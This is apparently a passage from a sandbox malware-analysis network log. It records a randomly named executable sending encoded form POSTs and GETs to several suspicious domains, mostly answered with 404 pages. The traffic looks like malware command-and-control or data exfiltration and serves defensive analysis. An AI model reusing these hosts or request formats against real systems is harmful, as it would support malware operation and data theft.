                                                                        Data Ascii: N6gPj2W=BLykkFst/8KRKxgHGB2FvudlyuCQvIopWOo4DI/O9S4Lc+LtX+J4M6WdSt6QgZ+A5sV7uidMTK4oPXTmFwE9aqoj6hDMPBExPeq7vOsCS218S3Rrmkb/4vj+vpWuyibdP+ejbB5gKFEBSGGdr/VRV5IzsUpfjTHeQeBj9rmpa/ZdIgi1qxtXznR0Ofmg2EpF00XASr+J9RWvwAdCJpeyhJInnCCv
                                                                        Nov 7, 2024 10:11:11.240986109 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:11 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549991172.96.191.232802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:12.794385910 CET1667OUTPOST /9rsa/ HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.thefokusdong43.click
                                                                        Referer: http://www.thefokusdong43.click/9rsa/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 42 4c 79 6b 6b 46 73 74 2f 38 4b 52 4b 78 67 48 47 42 32 46 76 75 64 6c 79 75 43 51 76 49 6f 70 57 4f 6f 34 44 49 2f 4f 39 52 59 4c 63 74 44 74 58 5a 31 34 64 4b 57 64 62 4e 36 52 67 5a 2b 42 35 71 39 67 75 69 51 78 54 4a 41 6f 56 31 4c 6d 44 42 45 39 56 71 6f 6a 7a 42 44 50 51 78 45 42 50 65 61 33 76 4f 38 43 53 32 31 38 53 31 4a 72 67 78 76 2f 36 76 6a 35 34 5a 57 71 6b 53 61 49 50 2b 32 7a 62 42 73 64 4b 56 6b 42 53 6d 32 64 6d 74 39 52 61 35 49 39 72 55 6f 61 6a 54 4b 41 51 65 31 56 39 72 36 58 61 38 35 64 4a 52 43 6a 33 69 4a 68 68 6d 4a 32 41 4d 36 34 6b 45 74 62 33 55 66 53 66 4e 36 45 78 44 36 39 34 6c 5a 46 66 5a 65 2f 33 34 30 4e 72 53 6a 5a 44 38 50 4f 45 57 7a 75 34 44 6e 37 6b 48 72 6d 74 58 57 73 73 53 74 49 35 4d 4d 43 35 76 4e 6c 42 6b 66 6e 55 46 6e 4a 4c 37 37 4f 59 39 55 68 2f 77 52 74 76 44 65 2f 6e 67 58 74 49 4d 30 38 4d 72 64 77 52 76 47 61 39 4a 36 42 76 4e 5a 59 6a 64 6c 42 46 73 54 4b 53 51 76 78 6a 69 41 2f 62 48 74 52 7a 47 59 45 5a 72 79 2f 7a 6d [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=BLykkFst/8KRKxgHGB2FvudlyuCQvIopWOo4DI/O9RYLctDtXZ14dKWdbN6RgZ+B5q9guiQxTJAoV1LmDBE9VqojzBDPQxEBPea3vO8CS218S1Jrgxv/6vj54ZWqkSaIP+2zbBsdKVkBSm2dmt9Ra5I9rUoajTKAQe1V9r6Xa85dJRCj3iJhhmJ2AM64kEtb3UfSfN6ExD694lZFfZe/340NrSjZD8POEWzu4Dn7kHrmtXWssStI5MMC5vNlBkfnUFnJL77OY9Uh/wRtvDe/ngXtIM08MrdwRvGa9J6BvNZYjdlBFsTKSQvxjiA/bHtRzGYEZry/zmV6wJaHJoAUZdp0vxV+CGtoOq0+MLaOr5TzAeFFN1yfSvSJHB8j+U0EBzm/WEJyBQNs9eya1VdSqENULmDbNLjBlf7sl1xhrDNhLuQq6bSwSpMnSb8rIAsBLNHYKPnuBuBJIImhvcz7EafAvMoOK4xEXKd6xgc+3ZfLFnZcEaVEGh7zTQiBv/FGva/AlNlD2dDGxmt7MRCsoq3AukE1MJVGeE1VneTdczVd0tFQZhuLc1NnQUm6SGlR5cKj5IWVQT0FLgD8zedhsF6/ZzD7gUoOhLwadjBm/eTVl4wRITBye9zvRyP4m2oe1Oc8hoCqbwxOvQZyDZ7MGacZfweB6aV2wIGbkBqLJ8M6WHaqJDWEcO7vbc3wiQykmaileZj5ncKbNn+v7FCuZNnzmumciQaF7Zaif1Ang28tF5PQZmpz6ORKv+Wu4JGlgIQATFe/2kOdS5VPuBPA6CbjSjhmy66uQGZLhLYmPoU9uRLrhDusVqFrWTcpvAB96TX5e2WwGDszbPLwFUDlc993fcqREUl1eQZ6EdXaS3nn65hc1eqJJerrJHE4EiqS6kyd7uVoEsuV0FKa0u7qlumS9TLLkIKWQ12nhucA/lcUvMSrwf6IXbtfSSAnMuS4yqXo6OUKol3oICBTdAyj9ryn/aEDxQdEWXs0Cxy6PX2W [TRUNCATED]
                                                                        Nov 7, 2024 10:11:13.799863100 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:13 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549992172.96.191.232802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:15.404628992 CET363OUTGET /9rsa/?N6gPj2W=MJaEnwMoptGuAyQmB3iPl7F+p8qtmKUBGuoMdJ29iBxpANTscusPMMCgTv6bu6SX3cIivBJkXrMlI2rZEQxlLsosjm3OJjcrR+TIxZJDXxtdEHg1mRP53ezQuvD90TyBQQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.thefokusdong43.click
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:16.374053001 CET1033INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                        pragma: no-cache
                                                                        content-type: text/html
                                                                        content-length: 796
                                                                        date: Thu, 07 Nov 2024 09:11:16 GMT
                                                                        server: LiteSpeed
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.5499933.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:21.637527943 CET624OUTPOST /6jke/ HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.spencermarcu.movie
                                                                        Referer: http://www.spencermarcu.movie/6jke/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 6d 54 68 66 39 30 57 50 71 42 76 42 6e 70 68 41 33 4a 78 4e 55 55 47 44 53 62 75 39 37 58 4a 6b 4e 51 4b 43 4e 59 63 63 61 44 76 4a 57 45 37 5a 43 78 78 43 4d 4a 54 5a 67 43 70 2f 63 7a 38 51 4b 77 45 67 75 6b 65 35 42 52 71 54 49 30 67 43 4b 6d 76 58 52 77 41 71 42 6f 6b 51 63 2f 4d 71 43 79 59 44 72 61 58 33 52 30 5a 33 42 2f 77 4c 6c 38 69 46 64 6a 38 38 38 67 75 34 6d 75 2b 64 41 78 38 74 57 56 71 71 6c 66 67 63 42 67 4d 75 53 6c 63 5a 68 50 4f 30 31 7a 76 4d 6e 51 4b 4b 53 75 52 57 4e 52 69 76 4c 34 6d 68 4f 44 32 77 33 5a 34 59 44 61 41 79 49 4e 47 38 70 2f 66 77 4c 34 61 6f 51 38 55 3d
                                                                        Data Ascii: N6gPj2W=mThf90WPqBvBnphA3JxNUUGDSbu97XJkNQKCNYccaDvJWE7ZCxxCMJTZgCp/cz8QKwEguke5BRqTI0gCKmvXRwAqBokQc/MqCyYDraX3R0Z3B/wLl8iFdj888gu4mu+dAx8tWVqqlfgcBgMuSlcZhPO01zvMnQKKSuRWNRivL4mhOD2w3Z4YDaAyING8p/fwL4aoQ8U=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.5499943.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:24.176678896 CET644OUTPOST /6jke/ HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.spencermarcu.movie
                                                                        Referer: http://www.spencermarcu.movie/6jke/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 6d 54 68 66 39 30 57 50 71 42 76 42 6d 4a 78 41 79 75 64 4e 53 30 47 41 4f 4c 75 39 31 33 49 6a 4e 51 32 43 4e 5a 59 71 62 77 62 4a 57 68 66 5a 44 30 4e 43 42 70 54 5a 76 69 70 36 54 54 38 6c 4b 77 4a 56 75 6c 69 35 42 52 4f 54 49 30 51 43 4a 56 48 59 51 67 41 6f 59 59 6b 57 54 66 4d 71 43 79 59 44 72 61 7a 5a 52 30 42 33 42 4f 41 4c 6a 64 69 61 44 7a 38 7a 37 67 75 34 73 2b 2f 55 41 78 39 43 57 55 32 41 6c 64 6f 63 42 6b 63 75 53 30 63 57 79 76 4f 79 71 44 75 59 6d 69 2f 61 56 63 6b 58 4a 7a 33 48 64 4c 62 61 4c 31 48 61 74 37 77 77 51 36 73 4b 59 65 4f 4c 34 50 2b 5a 52 62 4b 59 4f 72 41 55 52 49 45 57 4c 54 41 63 6c 66 6c 30 6f 4e 74 54 65 6e 50 77
                                                                        Data Ascii: N6gPj2W=mThf90WPqBvBmJxAyudNS0GAOLu913IjNQ2CNZYqbwbJWhfZD0NCBpTZvip6TT8lKwJVuli5BROTI0QCJVHYQgAoYYkWTfMqCyYDrazZR0B3BOALjdiaDz8z7gu4s+/UAx9CWU2AldocBkcuS0cWyvOyqDuYmi/aVckXJz3HdLbaL1Hat7wwQ6sKYeOL4P+ZRbKYOrAURIEWLTAclfl0oNtTenPw


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.5499953.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:26.725045919 CET1661OUTPOST /6jke/ HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.spencermarcu.movie
                                                                        Referer: http://www.spencermarcu.movie/6jke/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1244
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 6d 54 68 66 39 30 57 50 71 42 76 42 6d 4a 78 41 79 75 64 4e 53 30 47 41 4f 4c 75 39 31 33 49 6a 4e 51 32 43 4e 5a 59 71 62 77 44 4a 57 58 44 5a 42 58 6c 43 41 70 54 5a 6d 43 70 37 54 54 38 34 4b 77 52 4f 75 6c 75 44 42 58 4b 54 53 56 77 43 49 6b 48 59 5a 67 41 6f 51 34 6b 58 63 2f 4d 2f 43 32 30 48 72 61 6a 5a 52 30 42 33 42 4e 59 4c 6b 4d 69 61 42 7a 38 38 38 67 75 30 6d 75 2f 38 41 77 56 34 57 55 43 36 6c 74 49 63 42 45 4d 75 64 6d 30 57 6f 76 4f 77 70 44 75 51 6d 69 69 41 56 59 46 73 4a 79 43 73 64 4c 7a 61 4a 44 69 42 38 6f 78 6d 43 70 67 4c 61 38 76 6e 6e 50 75 4d 52 49 79 75 4a 72 73 53 55 4b 74 35 64 55 55 73 78 38 38 5a 2f 73 74 33 4a 58 32 4d 30 39 67 52 50 36 52 47 78 4a 71 4b 65 44 4c 63 5a 6a 53 47 70 78 78 76 4f 76 32 4e 5a 41 48 69 78 52 4d 68 74 32 63 5a 39 42 72 34 39 55 53 34 77 53 61 78 72 6a 49 34 36 37 41 6a 4f 4d 6c 5a 4f 32 51 43 4e 2f 73 72 70 69 32 67 56 72 68 37 39 69 79 47 78 4b 61 52 79 54 68 4a 4f 63 4a 4a 74 79 51 65 42 74 62 59 35 6c 69 33 66 69 [TRUNCATED]
                                                                        Data Ascii: N6gPj2W=mThf90WPqBvBmJxAyudNS0GAOLu913IjNQ2CNZYqbwDJWXDZBXlCApTZmCp7TT84KwROuluDBXKTSVwCIkHYZgAoQ4kXc/M/C20HrajZR0B3BNYLkMiaBz888gu0mu/8AwV4WUC6ltIcBEMudm0WovOwpDuQmiiAVYFsJyCsdLzaJDiB8oxmCpgLa8vnnPuMRIyuJrsSUKt5dUUsx88Z/st3JX2M09gRP6RGxJqKeDLcZjSGpxxvOv2NZAHixRMht2cZ9Br49US4wSaxrjI467AjOMlZO2QCN/srpi2gVrh79iyGxKaRyThJOcJJtyQeBtbY5li3fia8bfH+t6cewli80GQ9YlsG13Dehmj3DEx+kIYwya81pA/zi0cz52SUvvQhtuHlnIqFlaqhd0jb2x0yMvsxQ6xZHRLBEDLLaOq9/SZ6fG9n+uNlPAn2mfUqYR3noIYZ2plKR+m/4Zf5O2+YEwuBs1rS5m88KqvVbQ3J5OEIcBHsowZ55HAl2gmaOVNXRXSRxsDjKloHXwWrGmjzKEobVQfakx5BRRZhNuYku6R765OmJL/6g82CTT5UblMzZwxRGWoM/rNyKFWGgzO3jk90YLzBzKtxB93d84pEbvlFQPF20TcUhS8Yzst9DztwOx453swyDg0xyiSou2sD+ZCtSaKLqr7MS1lU8sSofour4dhM8vYLE3FYjDjCKH5b4XrgTu64OayOuinWfotrgLj6iyPsga/1wIhIywlU5mvmEt9FOyRzuIs/MCWUAe+Vu78LeJu4aeeteWuKvXDC7SlGKN88Ta3iRarUVvzqCfjx33ka4iTYhBIVJa4oJdnW7VOFMlGdylatGGWvVLVhbkuCyuG5VR4SFQTTyvUlm9XwsUrRKaA+MFy8M3uJxeyYPdR+62MNdZU/k8/DYJe79pSVbubDikM2jSyIU7QPqJ69B4KjlEXMGyMTjFPx+G8vhDRNgL7IEAJ1MOHxzBTgh6IycSmQYyPPo0dJhu06 [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.5499963.33.130.190802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:29.267080069 CET361OUTGET /6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1
                                                                        Host: www.spencermarcu.movie
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Nov 7, 2024 10:11:29.884881020 CET416INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Thu, 07 Nov 2024 09:11:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 36 67 50 6a 32 57 3d 72 52 4a 2f 2b 45 65 6f 71 51 48 31 6a 76 39 68 32 50 78 59 66 30 75 45 50 35 53 2f 30 52 45 53 43 42 44 6d 4d 72 78 43 5a 79 4c 73 64 32 54 46 4a 6d 31 56 55 4d 54 63 76 33 70 53 54 43 51 31 44 78 38 4d 6e 58 71 5a 53 78 53 47 50 55 6b 58 47 55 53 52 47 52 42 53 41 39 78 6e 4e 39 6b 39 65 58 30 6d 71 74 4c 65 54 52 31 70 64 2f 45 50 69 49 6d 2f 51 53 41 65 78 30 71 50 6e 50 4f 54 65 51 3d 3d 26 79 78 2d 3d 64 46 39 64 59 58 39 70 51 52 2d 78 49 68 46 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFp"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.549997103.191.208.137802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:35.653068066 CET627OUTPOST /7ozt/ HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.roopiedutech.online
                                                                        Referer: http://www.roopiedutech.online/7ozt/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 208
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                        Data Raw: 4e 36 67 50 6a 32 57 3d 6b 75 73 62 56 4a 79 37 6b 4e 55 65 48 6b 54 37 47 63 49 2f 62 6e 62 63 78 68 59 67 30 6e 4d 2b 46 51 77 4b 4f 48 78 67 4f 50 4e 2b 31 4d 66 73 6a 43 74 6a 56 30 75 58 6d 4d 39 6f 76 6f 69 2f 43 77 68 75 51 51 6f 45 6d 63 7a 72 6a 43 57 45 39 66 66 54 46 59 4e 5a 73 50 77 34 51 55 31 68 4d 4c 48 51 52 54 6b 79 57 50 6e 57 50 48 61 54 32 49 4e 67 49 74 62 72 30 35 6a 46 66 49 41 4d 33 43 4d 62 76 7a 51 7a 73 4f 61 34 62 78 75 4f 33 6f 50 57 4c 37 49 36 63 46 6c 38 48 54 62 50 6c 6d 2b 55 48 70 49 57 56 6a 65 53 6d 75 50 6a 64 43 67 36 6a 6b 45 56 57 6a 4b 33 55 72 55 50 58 43 57 36 75 5a 73 3d
                                                                        Data Ascii: N6gPj2W=kusbVJy7kNUeHkT7GcI/bnbcxhYg0nM+FQwKOHxgOPN+1MfsjCtjV0uXmM9ovoi/CwhuQQoEmczrjCWE9ffTFYNZsPw4QU1hMLHQRTkyWPnWPHaT2INgItbr05jFfIAM3CMbvzQzsOa4bxuO3oPWL7I6cFl8HTbPlm+UHpIWVjeSmuPjdCg6jkEVWjK3UrUPXCW6uZs=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.549998103.191.208.137802276C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 7, 2024 10:11:38.225048065 CET647OUTPOST /7ozt/ HTTP/1.1
                                                                        Host: www.roopiedutech.online
                                                                        Accept: */*
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Origin: http://www.roopiedutech.online
                                                                        Referer: http://www.roopiedutech.online/7ozt/
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 228
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
